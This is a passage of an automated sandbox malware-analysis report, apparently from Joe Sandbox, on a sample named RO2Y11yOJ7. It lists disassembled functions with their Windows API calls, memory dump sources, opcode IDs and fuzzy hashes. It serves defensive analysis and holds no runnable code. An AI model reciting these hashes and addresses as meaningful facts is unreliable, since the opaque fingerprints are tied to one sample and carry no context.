                                                            • Part of subcall function 0034410D: _memset.LIBCMT ref: 0034418D
                                                            • Part of subcall function 0034410D: _wcscpy.LIBCMT ref: 003441E1
                                                            • Part of subcall function 0034410D: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 003441F1
                                                          • KillTimer.USER32(?,00000001,?,?), ref: 003445B5
                                                          • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 003445C4
                                                          • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0037D5FE
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                          • String ID:
                                                          • API String ID: 1378193009-0
                                                          • Opcode ID: 2f7d5bc8932e742d1aa062d1b00ac1402d368a4802026d220b867029e366fb38
                                                          • Instruction ID: f264df8810b8490887457b7568e05d838bca23fee63b7b5f1e284c97781eb7f0
                                                          • Opcode Fuzzy Hash: 2f7d5bc8932e742d1aa062d1b00ac1402d368a4802026d220b867029e366fb38
                                                          • Instruction Fuzzy Hash: 7921AAB05047849FEB338B24D855BE7BBEC9F12318F04409DE69D9A245D77469848B51
                                                          Function 003B647F Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00345B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,003A793F,?,?,00000000), ref: 00345B8C
                                                            • Part of subcall function 00345B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,003A793F,?,?,00000000,?,?), ref: 00345BB0
                                                          • gethostbyname.WSOCK32(?,?,?), ref: 003B64AF
                                                          • WSAGetLastError.WSOCK32(00000000), ref: 003B64BA
                                                          • _memmove.LIBCMT ref: 003B64E7
                                                          • inet_ntoa.WSOCK32(?), ref: 003B64F2
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                          • String ID:
                                                          • API String ID: 1504782959-0
                                                          • Opcode ID: f9eeb2915d090ea0ce203086d67b629fb6fffc7404f4c471bb1e6c0fec0129cd
                                                          • Instruction ID: 15d42bbc531086cfd2572962bf6ec3b7e4f615662fc3731c4ed69a579d58ce60
                                                          • Opcode Fuzzy Hash: f9eeb2915d090ea0ce203086d67b629fb6fffc7404f4c471bb1e6c0fec0129cd
                                                          • Instruction Fuzzy Hash: 4C111C71900108AFCB06FBA4DD86DEEB7BDAF04310B148065F506AF262DB31AE14DB61
                                                          Function 00398E03 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 00398E23
                                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00398E35
                                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00398E4B
                                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00398E66
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID:
                                                          • API String ID: 3850602802-0
                                                          • Opcode ID: b1a5f12190042a69b6844b4e9d4fc15efa43e8c24839080110274dea7f6e9ccb
                                                          • Instruction ID: eca34fa29325f497925e3ea17697b8727207d69bffc5dbdb2321c0c5d6bf5473
                                                          • Opcode Fuzzy Hash: b1a5f12190042a69b6844b4e9d4fc15efa43e8c24839080110274dea7f6e9ccb
                                                          • Instruction Fuzzy Hash: 5011187AD01218FFEF11DFA5C885EADBBB8FB49710F204095E904B7290DA716E10DB94
                                                          Function 00341290 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00342612: GetWindowLongW.USER32(?,000000EB), ref: 00342623
                                                          • DefDlgProcW.USER32(?,00000020,?), ref: 003412D8
                                                          • GetClientRect.USER32(?,?), ref: 0037B77B
                                                          • GetCursorPos.USER32(?), ref: 0037B785
                                                          • ScreenToClient.USER32(?,?), ref: 0037B790
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Client$CursorLongProcRectScreenWindow
                                                          • String ID:
                                                          • API String ID: 4127811313-0
                                                          • Opcode ID: 340ce94d2a9895431a1922ebc17a82b8a757e69e792d7171d44097e1048b0597
                                                          • Instruction ID: d06574e34e16947be6643bfad37c4145966877abfeeac2fe2bce7fdb9cf0b240
                                                          • Opcode Fuzzy Hash: 340ce94d2a9895431a1922ebc17a82b8a757e69e792d7171d44097e1048b0597
                                                          • Instruction Fuzzy Hash: D2113A35600519EFCB12EFA4D889DFE77F9EB05300F404866F941EB250D770BA918BA5
                                                          Function 003A1473 Relevance: 6.1, APIs: 4, Instructions: 51sleepCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,003A001E,?,003A1071,?,00008000), ref: 003A1490
                                                          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,003A001E,?,003A1071,?,00008000), ref: 003A14B5
                                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,003A001E,?,003A1071,?,00008000), ref: 003A14BF
                                                          • Sleep.KERNEL32(?,?,?,?,?,?,?,003A001E,?,003A1071,?,00008000), ref: 003A14F2
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: CounterPerformanceQuerySleep
                                                          • String ID:
                                                          • API String ID: 2875609808-0
                                                          • Opcode ID: f485a08b8270a4013f35f8e368adda751ee645d2ee1c9ac9282271a51f1c2ee1
                                                          • Instruction ID: 60774e7e8f59902a1e9ec1106acf3ff6db0fbc81118e82ee93f1ce798ff1a5e2
                                                          • Opcode Fuzzy Hash: f485a08b8270a4013f35f8e368adda751ee645d2ee1c9ac9282271a51f1c2ee1
                                                          • Instruction Fuzzy Hash: 71115B31C0052DDBCF069FAAD989AFEBB78FF0EB11F054156E940B6240CB30A560CBA5
                                                          Function 0039DB40 Relevance: 6.0, APIs: 4, Instructions: 50registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 0039DB5C
                                                          • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 0039DB73
                                                          • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 0039DB88
                                                          • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 0039DBA6
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Type$Register$FileLoadModuleNameUser
                                                          • String ID:
                                                          • API String ID: 1352324309-0
                                                          • Opcode ID: 0f8d76de69e275e7aab28a8f8c8187053847c864639a14316fcb1fb7b9117d0d
                                                          • Instruction ID: ca16e1b461bca86695fd5a1f8349f397f36e7deddd99e58eea2f60792cfcca43
                                                          • Opcode Fuzzy Hash: 0f8d76de69e275e7aab28a8f8c8187053847c864639a14316fcb1fb7b9117d0d
                                                          • Instruction Fuzzy Hash: 3D11C0B1201304EFEB228F11DC4AF97BBBCEF00B00F118569A656C6440D7B0E914DBA1
                                                          Function 00377137 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                          • String ID:
                                                          • API String ID: 3016257755-0
                                                          • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                          • Instruction ID: 34f63ce1edea435700d61fef3c5e8b14ab1c6041215ce970902028deae2b34ce
                                                          • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                          • Instruction Fuzzy Hash: AE014B3204814EBBCF235E84CC458EE3F26BF19354B9A8425FE5C98531D33AC9B1AB81
                                                          Function 003CB2F9 Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetWindowRect.USER32(?,?), ref: 003CB318
                                                          • ScreenToClient.USER32(?,?), ref: 003CB330
                                                          • ScreenToClient.USER32(?,?), ref: 003CB354
                                                          • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 003CB36F
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: ClientRectScreen$InvalidateWindow
                                                          • String ID:
                                                          • API String ID: 357397906-0
                                                          • Opcode ID: 0fffd6e3103c00fc83a180d3860de646b2de76d4f076a2345225becf2a1efebb
                                                          • Instruction ID: 66943820033fbdb69ae3086b13ae5a9e23e70ebaae99b71e9f69d86de1bb90e6
                                                          • Opcode Fuzzy Hash: 0fffd6e3103c00fc83a180d3860de646b2de76d4f076a2345225becf2a1efebb
                                                          • Instruction Fuzzy Hash: B5114679D00249EFDB41DF98C544AEEFBB9FB08310F104166E914E3220D735AA658F50
                                                          Function 003A6C83 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • EnterCriticalSection.KERNEL32(?), ref: 003A6C8F
                                                            • Part of subcall function 003A776D: _memset.LIBCMT ref: 003A77A2
                                                          • _memmove.LIBCMT ref: 003A6CB2
                                                          • _memset.LIBCMT ref: 003A6CBF
                                                          • LeaveCriticalSection.KERNEL32(?), ref: 003A6CCF
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: CriticalSection_memset$EnterLeave_memmove
                                                          • String ID:
                                                          • API String ID: 48991266-0
                                                          • Opcode ID: 901ca615e816827c6436f3512d8f6c6602f6485abaf2cad4d80a57d6603aa71e
                                                          • Instruction ID: ddb14e73785d094c553281f4233de857b8bcda0bf1934b5f0a5f6a4c89546f0e
                                                          • Opcode Fuzzy Hash: 901ca615e816827c6436f3512d8f6c6602f6485abaf2cad4d80a57d6603aa71e
                                                          • Instruction Fuzzy Hash: 4AF0F47A104104ABCF126F55DC85E4ABB2AEF45320F14C065FE099E21AC775A911DBB4
                                                          Function 0039A15C Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0039A179
                                                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 0039A18C
                                                          • GetCurrentThreadId.KERNEL32 ref: 0039A193
                                                          • AttachThreadInput.USER32(00000000), ref: 0039A19A
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                          • String ID:
                                                          • API String ID: 2710830443-0
                                                          • Opcode ID: 6df611b1e3aa95e24ca32f004104b777d48ea4551fba7c67cffaba3f79db3942
                                                          • Instruction ID: c3988045878e59503bd29ac357f5f38515d76ab22637f6c83ad47777bb133113
                                                          • Opcode Fuzzy Hash: 6df611b1e3aa95e24ca32f004104b777d48ea4551fba7c67cffaba3f79db3942
                                                          • Instruction Fuzzy Hash: E4E03931141228BEEB225BA2DC0CED73F1DEF267A1F008125F508C4060C6759550CBE0
                                                          Function 00342218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetSysColor.USER32(00000008), ref: 00342231
                                                          • SetTextColor.GDI32(?,000000FF), ref: 0034223B
                                                          • SetBkMode.GDI32(?,00000001), ref: 00342250
                                                          • GetStockObject.GDI32(00000005), ref: 00342258
                                                          • GetWindowDC.USER32(?,00000000), ref: 0037C003
                                                          • GetPixel.GDI32(00000000,00000000,00000000), ref: 0037C010
                                                          • GetPixel.GDI32(00000000,?,00000000), ref: 0037C029
                                                          • GetPixel.GDI32(00000000,00000000,?), ref: 0037C042
                                                          • GetPixel.GDI32(00000000,?,?), ref: 0037C062
                                                          • ReleaseDC.USER32(?,00000000), ref: 0037C06D
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                          • String ID:
                                                          • API String ID: 1946975507-0
                                                          • Opcode ID: f20bf85cee7e04f2b419d52ca6e866ca576d68414c2de6b22abe8bec09288557
                                                          • Instruction ID: e18598ba91e7625ec023f29b66a20074c594ac7c345768457434bcaf1a9ade5f
                                                          • Opcode Fuzzy Hash: f20bf85cee7e04f2b419d52ca6e866ca576d68414c2de6b22abe8bec09288557
                                                          • Instruction Fuzzy Hash: 87E06D32100644EEEB225F74FC0DBD83B65EB05332F04C366FA69980E187729990DB11
                                                          Function 00398A3A Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetCurrentThread.KERNEL32 ref: 00398A43
                                                          • OpenThreadToken.ADVAPI32(00000000,?,?,?,0039860E), ref: 00398A4A
                                                          • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,0039860E), ref: 00398A57
                                                          • OpenProcessToken.ADVAPI32(00000000,?,?,?,0039860E), ref: 00398A5E
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: CurrentOpenProcessThreadToken
                                                          • String ID:
                                                          • API String ID: 3974789173-0
                                                          • Opcode ID: 20f5c3db2adc456408fa669daa41e919a8edaf142259f63d146aa185f8e91818
                                                          • Instruction ID: abb53e11a3de1dfded2898f57c0d11c0b90d8ecea2ae7572d89766d59af1d85d
                                                          • Opcode Fuzzy Hash: 20f5c3db2adc456408fa669daa41e919a8edaf142259f63d146aa185f8e91818
                                                          • Instruction Fuzzy Hash: 2AE08676601221EFDB216FB0AD0CF563BADFF51B92F054828B645C9040DA34A445C750
                                                          Function 003820B6 Relevance: 6.0, APIs: 4, Instructions: 20COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetDesktopWindow.USER32 ref: 003820B6
                                                          • GetDC.USER32(00000000), ref: 003820C0
                                                          • GetDeviceCaps.GDI32(00000000,0000000C), ref: 003820E0
                                                          • ReleaseDC.USER32(?), ref: 00382101
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: CapsDesktopDeviceReleaseWindow
                                                          • String ID:
                                                          • API String ID: 2889604237-0
                                                          • Opcode ID: a18238f37edab8fa703dd718c8ca37eeb78c96056c1ee27f0b9c7737fa7d6a4b
                                                          • Instruction ID: 9c6cea6dce18dd826951e9bf210048520272edee7f99735bee5149e20ee89e2a
                                                          • Opcode Fuzzy Hash: a18238f37edab8fa703dd718c8ca37eeb78c96056c1ee27f0b9c7737fa7d6a4b
                                                          • Instruction Fuzzy Hash: 17E0E5B5800204EFCB02AF60C808A9E7FFAEB4C350F108025F85ADB220CB38A1519F40
                                                          Function 003820CA Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetDesktopWindow.USER32 ref: 003820CA
                                                          • GetDC.USER32(00000000), ref: 003820D4
                                                          • GetDeviceCaps.GDI32(00000000,0000000C), ref: 003820E0
                                                          • ReleaseDC.USER32(?), ref: 00382101
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: CapsDesktopDeviceReleaseWindow
                                                          • String ID:
                                                          • API String ID: 2889604237-0
                                                          • Opcode ID: 05da15738074e08fd8089cb5e46739870aa6d2b370960da257b6eadc92dcf5a1
                                                          • Instruction ID: f44c6b572fcf92bf896325cc38a155940a67d58307f63beecf80e91d12b8dc3b
                                                          • Opcode Fuzzy Hash: 05da15738074e08fd8089cb5e46739870aa6d2b370960da257b6eadc92dcf5a1
                                                          • Instruction Fuzzy Hash: ECE0E5B5800204AFCB029F60C808A9D7FEAAB4C310F108025F95ADB220CB38B1519F40
                                                          Function 003463A0 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 317COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: %=
                                                          • API String ID: 0-1420429418
                                                          • Opcode ID: d9d1edfd85b989e66a5a420dff9f71bbe51f5e19bb4cfbb0e0a1eb55f2c35384
                                                          • Instruction ID: 9b1521deba7a0ed72759e8ed71ef7b1acd96c7850f2c030b065096c6c86c9afa
                                                          • Opcode Fuzzy Hash: d9d1edfd85b989e66a5a420dff9f71bbe51f5e19bb4cfbb0e0a1eb55f2c35384
                                                          • Instruction Fuzzy Hash: 57B1A171D001099BCF26EF94C8929FEB7F9EF46310F514066E502AF295DB34AE85CB52
                                                          Function 003BAFB7 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 313COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: __itow_s
                                                          • String ID: xb@$xb@
                                                          • API String ID: 3653519197-193068574
                                                          • Opcode ID: 182759ea62d65811569ce99678e4b1c4dc90deef3154cd3171f5e21ea3360a43
                                                          • Instruction ID: e9415f64ff3d1eb192460410e3a3970ca4d3f390080f600c95ce9dd70895479a
